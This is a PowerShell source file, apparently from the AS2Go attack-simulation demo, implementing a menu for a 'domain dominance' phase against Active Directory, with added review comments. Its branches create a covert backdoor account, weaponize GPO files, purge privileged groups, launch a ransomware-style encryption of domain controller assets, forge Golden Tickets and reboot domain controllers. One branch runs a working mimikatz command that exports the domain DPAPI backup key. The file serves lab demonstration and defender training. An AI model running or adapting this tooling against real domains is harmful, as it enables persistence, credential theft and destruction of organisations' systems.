Private/Start-Phase12DomainCompromise.ps1

function Start-Phase12DomainCompromise {
    <#
    .SYNOPSIS
        Interactive menu for the final "domain dominance" phase of the AS2Go demo.

    .DESCRIPTION
        Loops over a single-letter menu until "X" is chosen. Each branch asks for
        confirmation (unless $UnAttended is set) and then calls one of the
        phase helpers defined elsewhere in the module (New-BackDoorUser,
        Invoke-GroupManipulation, New-GPOManipulation, New-UserManipulation,
        New-GoldenTicket, New-RansomwareAttack, Stop-AS2GoDemo,
        Restart-VictimMachines). Several branches perform destructive or
        high-impact actions in the lab domain; see the per-branch notes below.

        Globals read:    $UnAttended, $SkipClearHost, $yes, $no, $NextStep,
                         $Script:DateFormatLog, $Script:FGCHighLight,
                         $Script:DefautExfiltrationFolder, $Script:ASDC,
                         $Script:ASFQDN, $Script:ASOfflineDITFile, $global:BDUser,
                         $fgcC/$fgcV/$fgcF/$fgcS, $env:LOGONSERVER
        Globals written: $NextStep (suggested default for the next prompt),
                         $repeat (loop control), $answer, $question

        NOTE(review): the menu text and the switch do not fully agree. The menu
        advertises "L" for the Golden Ticket step, but the switch only matches
        "G", so "L" falls through to the default "out of scope" branch. The "S"
        branch is reachable although its menu line is commented out.

    .OUTPUTS
        None. All output goes to the host; start/end and run time are written
        via Write-Log.
    #>

    ################################################################################
    ##### #####
    ##### Phase 12 Domain Compromise
    ##### #####
    ################################################################################

    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)
    #################### main code | out- host #####################
  
    # $repeat is assigned in every switch arm, so the Until test below is always defined
    # after the first pass; $NextStep may be empty on the first prompt (no default).
    Do {
        
        Invoke-Output -Type Header -Message "Domain Dominance & Persistence - Select the final operation:"

        # Menu keys: B, T, P, U, E, K, L, R, X are shown; note the "L"/"G" mismatch
        # described in the function help above.
        # Write-Host " S " -ForegroundColor Yellow -NoNewline; Write-Host "- to show Services and Processes on Logon Server`n"
        Write-Host " B " -ForegroundColor Yellow -NoNewline; Write-Host "- Establish persistent domain access through a covert backdoor account"
        Write-Host " T " -ForegroundColor Yellow -NoNewline; Write-Host "- Weaponize Group Policy Template (GPT) files for domain-wide compromize"
        Write-Host " P " -ForegroundColor Yellow -NoNewline; Write-Host "- Purge all privileged group memberships to grant exclusive control to the backdoor account"
        Write-Host " U " -ForegroundColor Yellow -NoNewline; Write-Host "- Disable user accounts or enforce password resets (retain backdoor control)"
        Write-Host " E " -ForegroundColor Yellow -NoNewline; Write-Host "- Encrypt critical Domain Controller assets for strategic leverage"
        Write-Host " K " -ForegroundColor Yellow -NoNewline; Write-Host "- Extract the DPAPI master key for credential and secret recovery"  -NoNewline; Write-Host " **" -ForegroundColor Yellow
        Write-Host " L " -ForegroundColor Yellow -NoNewline; Write-Host "- Forge a Golden Ticket to achieve unrestricted Kerberos dominance"  -NoNewline; Write-Host " **" -ForegroundColor Yellow
        Write-Host " R " -ForegroundColor Yellow -NoNewline; Write-Host "- Trigger coordinated reboot across accessible Domain Controllers"
        Write-Host "`n X " -ForegroundColor Yellow -NoNewline; Write-Host "- Exit AS2Go"

        # Unattended runs never reach the prompt: the menu answer is forced to $yes,
        # so the outer switch relies on the "$yes" value also being a valid menu key
        # or on the default arm (presumably $yes is "Y"; confirm in the caller).
        If ($UnAttended) {
            $answer = $yes 
        }
        else {
            $question = "Enter or confirm your attack here! Default "
            $answer = Get-Answer -question $question -defaultValue $NextStep
        }

        switch ($answer) {

            # B: create the persistence account; suggests "T" as the next step.
            "B" {
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -T Header -M "Create a backdoor account with elevated group memberships for persistence"
        
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $answer = Show-DecisionPrompt

                }
    
                If ($answer -eq $yes) {
                    New-BackDoorUser
                    If ($UnAttended) { Start-Sleep 2 } else { Pause }
                }
                $NextStep = "T"
                $repeat = $yes 
            }
            # P: strip privileged group memberships.
            # NOTE(review): $answer is set to $yes before the If/else and the
            # interactive else-branch is empty, so this arm runs WITHOUT a
            # confirmation prompt in interactive mode. Intentional or not, it
            # differs from every other arm; a Show-DecisionPrompt call in the
            # else-branch would restore the usual guard.
            "P" {
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -T Header -M "Purge all privileged group memberships"
                $answer = $yes
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {

                }
    
                If ($answer -eq $yes) {
                    Invoke-GroupManipulation
                    If ($UnAttended) { Start-Sleep 2 } else { Pause }
                }
                $NextStep = "T"
                $repeat = $yes 
            }
            # T: locate a GPO linked on the domain and hand its ID/name to
            # New-GPOManipulation. Get-GPOLinkedOnDomain is assumed to return a
            # two-element sequence (ID, name); an empty result would index into
            # $null here — verify against the helper.
            "T" {
                If (-not $SkipClearHost) { Clear-Host }
                Write-Host "____________________________________________________________________`n" 
                Write-Host " Manipulate Group Policy Templates (GPT) files "
                Write-Host "____________________________________________________________________`n"     
        
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }
    
                If ($answer -eq $yes) {
                    # New-BackDoorUser
                    $GPODetails = Get-GPOLinkedOnDomain
                    # write-host $GPODetails[0] | Out-Host
                    # write-host $GPODetails[1] | Out-Host
                    New-GPOManipulation -ID $GPODetails[0] -name $GPODetails[1]

                    # If ($UnAttended) { Start-Sleep 2 } else { Pause }
                }
                $NextStep = "U"
                $repeat = $yes  
            }
            # U: disable users / force password resets via New-UserManipulation.
            # The backdoor account name ($global:BDUser) is echoed so the operator
            # knows it is excluded; the exclusion itself happens in the helper.
            "U" {
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -T Header -M "Disable user accounts or/and enforce password resets"
      
                # U+1F600 (grinning face) built from its code point so the source stays ASCII.
                $EmojiIcon = [System.Convert]::toInt32("1F600", 16)
                $Smily = [System.Char]::ConvertFromUtf32($EmojiIcon)
    
        
                Write-host " ... will ignore your new backdoor user " -NoNewline
                Write-host $global:BDUser -ForegroundColor $Script:FGCHighLight -NoNewline
                Write-Host " - $Smily"
            
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }
    
                If ($answer -eq $yes) {
                    #$Script:ASSearchBase = Get-KeyValue -key "MySearchBase"
                    New-UserManipulation
                    If ($UnAttended) { Start-Sleep 2 } else { Pause }
                } 
                $NextStep = "T"
                $repeat = $yes   
            }
            # G: Golden Ticket step. Deliberately answered $no when unattended, so it
            # only ever runs interactively. Does not update $NextStep.
            # NOTE(review): the menu advertises this step under "L", not "G".
            "G" {
                If (-not $SkipClearHost) { Clear-Host }
                Write-Host "____________________________________________________________________`n" 
                Write-Host " create golden ticket for an unknown user "
                Write-Host "____________________________________________________________________`n"     
    
                If ($UnAttended) {
                    $answer = $no 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }
    
                If ($answer -eq $yes) {
    
                    #run function
                    New-GoldenTicket
                } 
                $repeat = $yes  
            }
            # E: encryption ("ransomware") step against the DC assets named by
            # $Script:ASOfflineDITFile. This is the most destructive arm in the menu.
            # NOTE(review): the interactive Get-Answer call is commented out and
            # $answer is forced to $yes, so selecting "E" runs New-RansomwareAttack
            # immediately with no confirmation, attended or not. Re-enabling the
            # prompt (or a Show-DecisionPrompt call) would bring this arm in line
            # with the others and prevent an accidental keypress from encrypting
            # the lab DC.
            "E" {
                #region Step - ran ransomware attack?
                #Pause
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -T Header -M "Encrypt critical Domain Controller assets for strategic leverage"
    
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $question = "Do you want to run this attack - Y or N? Default "
                    #$answer = Get-Answer -question $question -defaultValue $Yes
                    $answer = $yes 
                }

                If ($answer -eq $yes) {
                    #run functions
                    New-RansomwareAttack -BackupShare $Script:ASOfflineDITFile
                    If ($UnAttended) { Start-Sleep 2 } else { Pause }
                }
                #endregion Step - ran ransomware attack?
                $repeat = $yes   
            }
            # K: DPAPI domain backup key export. The command is first echoed via
            # Write-Highlight and then executed. Invoke-Command has no -ComputerName,
            # so the script block runs in the local session; ".\mimikatz.exe" is
            # resolved relative to the CURRENT WORKING DIRECTORY, not $PSScriptRoot,
            # so the step fails silently-ish if the shell is started elsewhere.
            # Output files are written under $Script:DefautExfiltrationFolder and
            # listed afterwards. From a defender's view this step is a high-value
            # detection opportunity on the DC (backup key retrieval by a non-DC
            # principal) and a good checkpoint to validate monitoring in the lab.
            "K" {
                #region Step - export DATA PROTECTION API master key
                If (-not $SkipClearHost) { Clear-Host }
                Write-Host "____________________________________________________________________`n" 
                Write-Host " try to export DATA PROTECTION API master key "
                Write-Host ""
                write-host " Attackers can use the master key to decrypt ANY secret "         
                Write-Host " protected by DPAPI on all domain-joined machines"
                Write-Host "____________________________________________________________________`n"     
                write-host ""
                Write-Host      -NoNewline " Command: "
                Write-Highlight -Text ".\mimikatz.exe ", """cd $Script:DefautExfiltrationFolder"" ", """privilege::", "debug", """ ""lsadump::", "backupkeys ", "/system:", "$Script:ASDC.$Script:ASFQDN", " /export", """ ""exit"""  `
                    -Color $fgcC, $fgcV, $fgcF, $fgcV, $fgcF, $fgcV, $fgcS, $fgcV, $fgcS, $fgcF
                Write-Host  ""

                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }

                If ($answer -eq $yes) {
                    # -ErrorAction Ignore: folder may already exist from an earlier phase.
                    New-Item $Script:DefautExfiltrationFolder -ItemType directory -ErrorAction Ignore
                    Invoke-Command -ScriptBlock { .\mimikatz.exe "cd $Script:DefautExfiltrationFolder" "privilege::debug" "lsadump::backupkeys /system:$Script:ASDC.$Script:ASFQDN /export" "exit" }
                    write-host ""
                    Write-Host      -NoNewline " Command: "
                    Write-Highlight -Text "get-item ", "$Script:DefautExfiltrationFolder\ntds_*"  `
                        -Color $fgcC, $fgcV
                    Write-Host  ""   
                    get-item "$Script:DefautExfiltrationFolder\ntds_*" | out-host
                    If ($UnAttended) { Start-Sleep 2 } else { Pause }
                }
                #endregion Step - export DATA PROTECTION API master key
                $repeat = $yes      
            }
            # R: wrap up the demo (Stop-AS2GoDemo with -NextStepReboot) and then
            # reboot the lab machines. Note there is no Pause here and $repeat stays
            # $yes, so control returns to the menu after the reboot is triggered.
            "R" {
                #Pause
                If (-not $SkipClearHost) { Clear-Host }

                Invoke-Output -T Header -M "Trigger coordinated reboot across accessible Domain Controllers"
   
                If ($UnAttended) {
                    $answer = $yes 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }

                If ($answer -eq $yes) {
                    #run functions
                    Stop-AS2GoDemo -NextStepReboot $yes
                    Restart-VictimMachines
                }
                $repeat = $yes  
            }
            # S: read-only inspection of services/processes on the logon server.
            # Hidden from the menu (its line is commented out) but still selectable.
            # Skipped when unattended ($answer = $no) because Out-GridView is
            # interactive. Get-Service/Get-Process -ComputerName exist in Windows
            # PowerShell 5.1 only; this arm is not expected to work under PowerShell 7.
            "S" {
                If (-not $SkipClearHost) { Clear-Host }
                Write-Host "____________________________________________________________________`n" 
                Write-Host " Show Services and Processes on Logon Server "
                Write-Host "____________________________________________________________________`n"
                    
                    
                # $env:LOGONSERVER is "\\NAME"; strip the leading backslashes.
                $server = $env:LOGONSERVER.replace("\", "")

                Write-Host      -NoNewline " Commands: "
                Write-Highlight -Text " Get-Service ", "-ComputerName ", "$server ", "| " , "Out-GridView ", "-Title " , "Services on $server"`
                    -Color $fgcC, $fgcS, $fgcV, $fgcF, $fgcC, $fgcS, $fgcV

                Write-Host      -NoNewline " " 
                Write-Highlight -Text " Get-Process ", "-ComputerName ", "$server ", "| " , "Out-GridView ", "-Title " , "Processes on $server"`
                    -Color $fgcC, $fgcS, $fgcV, $fgcF, $fgcC, $fgcS, $fgcV 
                Write-Host ""

    
                If ($UnAttended) {
                    $answer = $no 
                }
                else {
                    $question = "Do you want to run these steps - Y or N? Default "
                    $answer = Get-Answer -question $question -defaultValue $Yes
                }
    
                If ($answer -eq $yes) {
    
                    Get-Service -ComputerName $server | Sort-Object status | Out-GridView -Title "Services on $server" 
                    Get-Process -ComputerName $server | Out-GridView -Title "Processes on $server"
                } 
                $repeat = $yes  
            }
            # X: the only arm that ends the loop.
            "X" {
                $repeat = $no
            }

            # Anything else (including the advertised "L") lands here.
            default {
                Write-Host "out of scope"
                $repeat = $yes  
            }
        }
            





        If (-not $SkipClearHost) { Clear-Host }
  
    } Until ($repeat -eq $no)

    ######################## main code ############################
    $runtime = Get-RunTime -StartRunTime $StartRunTime
    Write-Log -Message " Run Time: $runtime [h] ###"
    Write-Log -Message "### End Function $CurrentFunction ###"
}